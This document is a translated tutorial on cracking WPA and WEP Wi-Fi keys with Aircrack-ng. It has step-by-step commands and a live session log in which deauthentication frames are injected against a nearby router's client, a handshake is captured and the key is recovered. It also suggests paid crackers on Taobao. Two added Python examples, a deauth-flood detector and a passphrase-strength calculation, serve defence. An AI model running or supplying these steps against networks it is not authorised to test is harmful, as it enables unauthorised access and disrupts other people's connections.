Wireless cracking now has GUI front-ends and few people still use command-line tools like aircrack, but I find the command line gives more freedom than a GUI.

Here is a simple WPA cracking walkthrough. WEP is rarely used any more, so covering it is probably of little use; I will still list the WEP commands at the end.
First, the commonly used tools in the Aircrack-ng suite:
airmon-ng: checks the state of the Wi-Fi interface and puts it into monitor mode
airodump-ng: scans networks and captures packets; used together with aireplay-ng
aireplay-ng: packet injection tool
aircrack-ng: key-cracking tool
0x01 ifconfig wlan0 up #bring the wireless card up
0x02 airmon-ng start wlan0 #put the card into Monitor mode (airmon-ng's optional second argument is a channel number, not "up"; the stray "up" is what produces the "integer expression expected" message in the session below)
0x03 airodump-ng -w <capture path and filename> -c <channel> mon0 #start capturing; add --ivs to save only the IVs
A note here: for cracking the key we generally only need the IV data. Without the --ivs option airodump-ng saves a .cap file by default, which contains all captured traffic and grows large, sometimes to several hundred MB. If you do not intend to analyse the traffic and only want to crack the key, saving as .ivs is recommended.
0x04 Open another bash window and run aireplay-ng -0 10 -a <AP MAC> -c <client MAC> mon0 #deauth injection to obtain the WPA handshake
0x05 aircrack-ng -w <wordlist path> <ivs/cap file path> #start the dictionary attack on the capture. You can also pay someone on Taobao to run it: they have large wordlists and GPU cracking, which greatly raises the speed and success rate.
----------------------That covers the approach; below is the hands-on run----------------------
[email protected]:~# ifconfig wlan0 up
[email protected]:~# airmon-ng start wlan0 up
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]/usr/local/sbin/airmon-ng: line 631: [: up: integer expression expected
(monitor mode enabled on mon0)
---------------------
CH 7 ][ Elapsed: 52 s ][ 2013-04-22 19:02
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:10:77:1F:DA:44 -44 90 500 60 0 7 11e WPA2 CCMP PSK Netcore_2_4G
0E:34:CB:00:97:A2 -71 0 4 0 0 6 54e. WPA2 TKIP MGT <length: 0>
C8:3A:35:3B:D1:00 -73 57 317 136 9 7 11e WPA CCMP PSK Tenda_3BD100
00:25:86:32:82:0A -74 0 6 0 0 6 54 . WPA2 CCMP PSK liaojie
78:44:76:01:3C:26 -76 78 476 0 0 7 54 WPA2 CCMP PSK ipTIME
00:34:CB:00:82:C5 -76 0 13 0 0 6 54e. WPA2 TKIP PSK <length: 0>
0E:34:CB:00:8B:18 -79 8 4 0 0 6 54e. WPA2 TKIP MGT <length: 0>
06:34:CB:00:8B:18 -79 0 7 0 0 6 54e. OPN CMCC
00:34:CB:00:8B:18 -79 0 2 0 0 6 54e. WPA2 TKIP PSK <length: 0>
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 00:90:A2:BC:DB:A6 -56 0 - 1 0 22
(not associated) 00:21:6B:5C:66:7A -78 0 - 1 0 1
(not associated) 0C:37:DC:9B:2B:7C -80 0 - 1 0 2
C8:3A:35:3B:D1:00 08:10:77:1F:DA:44 -44 11e-11e 0 77
[2]+ Stopped airodump-ng -w /home/test -c 7 --ivs mon0
[email protected]:~#
BSSID is the AP's MAC and STATION is the client's MAC; only while a client is connected to the AP can the capture-and-crack be carried out. (I think that is how it works... if any experts know other methods, please share.)
Before the injection attack the Frames and #Data counts are very small, so at this point we use the client to carry out the attack.
[email protected]:~# aireplay-ng -0 10 -a C8:3A:35:3B:D1:00 -c 08:10:77:1F:DA:44 mon0
19:05:04 Waiting for beacon frame (BSSID: C8:3A:35:3B:D1:00) on channel 7
19:05:05 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [23|52 ACKs]
19:05:06 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [32|52 ACKs]
19:05:06 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [34|49 ACKs]
19:05:07 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [27|46 ACKs]
19:05:07 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [28|55 ACKs]
19:05:08 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [32|49 ACKs]
19:05:08 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [33|48 ACKs]
19:05:09 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [36|52 ACKs]
19:05:10 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [40|59 ACKs]
19:05:10 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [53|51 ACKs]
The number after -0 is the number of attack rounds; if no WPA handshake appears after 10 rounds, keep attacking.
After entering the attack command in the other window, return to the airodump-ng screen and you will see a WPA handshake notice in the top-right corner.
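From the defender's side, the aireplay-ng session above is very loud: 64 deauthentication frames per second aimed at one station, where a healthy network sends a handful at most. The Python below is an added example, not code from the original post: a minimal wireless-IDS style check that counts deauth/disassoc frames per BSSID over a sliding window and alerts on a burst. Its input is a constructed list of already-parsed frames reusing the MAC addresses from the airodump-ng screen above, not a real capture. The mitigation for this whole step is Management Frame Protection (802.11w): with it enabled, clients reject forged deauth frames, so a handshake cannot be forced this way.

```python
from collections import defaultdict, deque

# IEEE 802.11 management-frame subtypes this check cares about.
SUBTYPE_BEACON = 0x08
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C

# More than THRESHOLD deauth/disassoc frames from one BSSID inside
# WINDOW_MS is treated as a flood (tune for your environment).
WINDOW_MS = 10_000
THRESHOLD = 20


def build_sample_frames():
    """Constructed sample input (not a real capture): a list of
    (timestamp_ms, subtype, bssid, destination) tuples, as a monitor-mode
    sniffer's parser might emit them. It mixes normal beacons, a couple of
    ordinary deauth/disassoc frames, and a burst of 64 directed deauths
    like the one aireplay-ng reports in the session above."""
    ap = "C8:3A:35:3B:D1:00"        # target AP MAC from the page's airodump output
    client = "08:10:77:1F:DA:44"    # client MAC from the page
    other_ap = "78:44:76:01:3C:26"  # another AP from the page, behaving normally
    frames = []
    for i in range(50):             # beacons every 100 ms: background noise
        frames.append((i * 100, SUBTYPE_BEACON, ap, "FF:FF:FF:FF:FF:FF"))
    frames.append((1000, SUBTYPE_DEAUTH, ap, client))              # a single deauth is normal
    frames.append((500, SUBTYPE_DEAUTH, other_ap, "00:90:A2:BC:DB:A6"))
    frames.append((7000, SUBTYPE_DISASSOC, other_ap, "00:90:A2:BC:DB:A6"))
    for i in range(64):             # 64 deauths within 640 ms: the attack burst
        frames.append((3000 + 10 * i, SUBTYPE_DEAUTH, ap, client))
    return frames


def count_deauths(frames):
    """Total deauth/disassoc frames per BSSID, for a summary line."""
    totals = defaultdict(int)
    for _ts, subtype, bssid, _dst in frames:
        if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            totals[bssid] += 1
    return dict(totals)


def detect_deauth_floods(frames, window_ms=WINDOW_MS, threshold=THRESHOLD):
    """Sliding-window rate check. Returns {bssid: timestamp_ms}: for each
    BSSID that exceeded `threshold` deauth/disassoc frames within any
    `window_ms`, the time of the frame that first tripped the alert."""
    recent = defaultdict(deque)   # per-BSSID timestamps still inside the window
    alerts = {}
    for ts, subtype, bssid, _dst in sorted(frames, key=lambda f: f[0]):
        if subtype not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        window = recent[bssid]
        window.append(ts)
        while ts - window[0] > window_ms:   # drop frames that aged out
            window.popleft()
        if len(window) > threshold and bssid not in alerts:
            alerts[bssid] = ts
    return alerts


if __name__ == "__main__":
    frames = build_sample_frames()
    print("deauth/disassoc totals per BSSID:", count_deauths(frames))
    for bssid, ts in detect_deauth_floods(frames).items():
        print(f"ALERT: deauth flood from {bssid}, threshold crossed at t={ts} ms")
```

On the constructed input the single deauth and the two frames from the other AP stay below the threshold, while the burst trips the alert at 3190 ms, the 21st deauth from the target BSSID inside the window. A real sensor would feed this from a monitor-mode capture and also check whether the source MAC is a BSSID it manages, since the forged frames carry the legitimate AP's address.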
CH 7 ][ Elapsed: 4 mins ][ 2013-04-22 19:09 ][ WPA handshake: C8:3A:35:3B:D1:00
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:10:77:1F:DA:44 -43 100 2603 295 0 7 11e WPA2 CCMP PSK Netcore_2_4G
00:34:CB:00:97:A2 -68 0 8 0 0 6 54e. WPA2 TKIP PSK <length: 0>
C8:3A:35:3B:D1:00 -71 100 783 638 0 7 11e WPA CCMP PSK Tenda_3BD100
06:34:CB:00:97:A2 -71 0 7 0 0 6 54e. OPN CMCC
00:25:86:32:82:0A -72 0 24 0 0 6 54 . WPA2 CCMP PSK liaojie
0A:34:CB:00:82:C5 -76 0 16 0 0 6 54e. WPA2 TKIP MGT <length: 0>
78:44:76:01:3C:26 -75 83 2252 0 0 7 54 WPA2 CCMP PSK ipTIME
00:34:CB:00:82:C5 -76 0 47 0 0 6 54e. WPA2 TKIP PSK <length: 0>
06:34:CB:00:8B:18 -78 0 8 0 0 6 54e. OPN CMCC
00:34:CB:00:8B:18 -79 11 6 0 0 6 54e. WPA2 TKIP PSK <length: 0>
0E:34:CB:00:8B:18 -79 0 9 0 0 6 54e. WPA2 TKIP MGT <length: 0>
06:34:CB:00:82:C5 -75 0 14 0 0 6 54e. OPN CMCC
0E:34:CB:00:97:A2 -66 0 14 0 0 6 54e. WPA2 TKIP MGT <length: 0>
8C:21:0A:D1:51:B4 -76 0 1 0 0 6 54e. WPA2 CCMP PSK 1024_D151B4
00:34:CB:00:76:6A -75 0 9 0 0 6 54e. WPA2 TKIP PSK <length: 0>
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 00:90:A2:BC:DB:A6 -56 0 - 1 0 127
(not associated) 0C:37:DC:9B:2B:7C -80 0 - 1 0 12
C8:3A:35:3B:D1:00 E0:A6:70:D7:90:8E -1 11e- 0 0 36
C8:3A:35:3B:D1:00 08:10:77:1F:DA:44 -44 1e-11e 0 1672 Tenda_3BD100
8C:21:0A:D1:51:B4 70:F1:A1:1E:22:55 -80 0 - 1 0 11
[3]+ Stopped airodump-ng -w /home/test -c 7 --ivs mon0
[email protected]:~#
The MAC after WPA handshake is the AP's MAC; the AP is the wireless router being cracked.
Open a window and check the size of the ivs file:
[email protected]:~# cd /home
[email protected]:/home# ls -al test-01.ivs
-rw-r--r-- 1 root root 6284 2013-04-22 18:55 test-01.ivs
6284 bytes, so it can be cracked (generally anything other than 0 bytes can be cracked). You can send this file to someone on Taobao to crack, or crack it locally.
[email protected]:~# aircrack-ng -w /home/crack.txt /home/test-03.ivs
Opening /home/test-03.ivs
Read 33 packets.
# BSSID ESSID Encryption
1 08:10:77:1F:DA:44 Netcore_2_4G Unknown
2 78:44:76:01:3C:26 ipTIME Unknown
3 C8:3A:35:3B:D1:00 Tenda_3BD100 WPA (1 handshake)
4 0A:34:CB:00:76:6A CMCC-AUTO Unknown
5 06:34:CB:00:8B:18 CMCC Unknown
6 06:34:CB:00:76:6A CMCC Unknown
7 00:25:86:32:82:0A liaojie Unknown
8 06:34:CB:00:82:C5 CMCC Unknown
9 20:DC:E6:52:52:8E TP-LINK_ooo Unknown
10 06:34:CB:00:97:A2 CMCC Unknown
11 8C:21:0A:D1:51:B4 1024_D151B4 Unknown
Index number of target network ? 3 #after you enter the crack command it asks you to choose the index of the network to crack; any entry with WPA under "Encryption" means a handshake has been captured for that AP and it can be cracked. Here I choose 3.
Opening /home/test-03.ivs
Reading packets, please wait...
A note on the ivs filename: in the Aircrack-ng suite, if you give the name "test" the file is automatically named "test-01.ivs"; a second capture produces "test-02.ivs", and so on. Because I tested three times while writing this article, the file is test-03.ivs.
Aircrack-ng 1.1 r2178
[00:01:27] 72176 keys tested (814.02 k/s)
KEY FOUND! [ 0222XXXX ]
Master Key : D5 8B BC BE 46 3D 43 2D 5F 03 A9 2F 61 95 D6 DD
6C 13 ED 6F F9 A5 15 73 1C BB C2 FC 8E 34 CC DA
Transient Key : E5 55 3D E8 3F 89 4A 72 C2 BD E1 60 C7 CA DB AF
DB 08 A3 C4 C5 FC A9 B4 96 86 2D 46 A6 57 B8 A4
57 F6 09 42 94 E7 A7 FF 79 89 83 AB C2 00 13 26
F7 AA D8 60 B8 5A 0A DC 81 57 53 29 25 FD 17 A0
EAPOL HMAC : AE 6F C0 44 A3 E7 E4 32 DA 83 71 DF 48 26 32 05
[email protected]:~#
Cracking result: the key is 0222XXXX
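The three values aircrack-ng prints at the end are the WPA key hierarchy: the Master Key is the PMK derived from the passphrase and SSID, the Transient Key is the PTK derived from the PMK together with the nonces and MAC addresses in the handshake, and the EAPOL HMAC is the MIC of a handshake message, which is what lets a captured handshake be checked against candidate passphrases offline. The Python below is an added example, not code from the original post and not aircrack-ng's own code: it derives the PMK with the standard IEEE 802.11i PBKDF2 parameters and, using the 814.02 k/s rate quoted in the output above, shows why an 8-digit key like the one found here falls in minutes while a long random passphrase does not. The known-answer check uses the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE").

```python
import hashlib

# Cracking rate aircrack-ng reports on this page: 814.02 k/s on a CPU.
PAGE_RATE_KEYS_PER_SEC = 814_020


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key for WPA/WPA2-PSK: PBKDF2-HMAC-SHA1 over the
    passphrase with the SSID as salt, 4096 iterations, 256-bit output
    (IEEE 802.11i). This is the value aircrack-ng prints as 'Master Key'.
    Because the PMK does not depend on the handshake, every candidate
    passphrase costs a full derivation (2 x 4096 HMAC-SHA1 for 32 bytes),
    which is why the CPU rate above is hundreds of thousands, not millions."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of candidates an exhaustive search of this password policy covers."""
    return alphabet_size ** length


def worst_case_seconds(alphabet_size: int, length: int,
                       rate: int = PAGE_RATE_KEYS_PER_SEC) -> float:
    """Time to try the whole keyspace at `rate` PMK derivations per second."""
    return keyspace(alphabet_size, length) / rate


if __name__ == "__main__":
    print("PMK(password, IEEE) =", wpa_pmk("password", "IEEE").hex())
    # Constructed policies for comparison; the first matches the 8-digit
    # key recovered in the session above.
    policies = [("8 digits", 10, 8),
                ("8 lowercase letters", 26, 8),
                ("12 random letters+digits", 62, 12)]
    for name, alphabet, length in policies:
        secs = worst_case_seconds(alphabet, length)
        print(f"{name:26s} {keyspace(alphabet, length):>24,d} candidates"
              f"  {secs / 86400:>18,.1f} days at {PAGE_RATE_KEYS_PER_SEC:,d} k/s")
```

At the page's rate the full 8-digit space (100,000,000 keys) is exhausted in about two minutes, which is consistent with the 72,176 keys tested in 1 min 27 s before the hit; a 12-character random passphrase over 62 symbols takes longer than the age of the universe even with a GPU several hundred times faster. The PMK derivation is the same whether the attacker uses a CPU or a GPU, so passphrase entropy is the only lever WPA2-PSK gives the defender; WPA3's SAE handshake removes the offline dictionary attack entirely.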
------------------------------------Below is the rough process for WEP cracking----------------------------------------
0x01 ifconfig wlan0 up #bring the wireless card up
0x02 airmon-ng start wlan0 #put the card into Monitor mode (airmon-ng's optional second argument is a channel number, not "up")
0x03 airodump-ng -w <capture path> -c <channel> --ivs mon0 #start capturing
0x04 aireplay-ng -3 -b <AP MAC> -h <client MAC> mon0 #ARP-request replay injection
0x05 aircrack-ng <ivs/cap path> #crack WEP; no wordlist is needed, and with enough data it usually takes only a few minutes
------------------------------------------------------------------------------------------------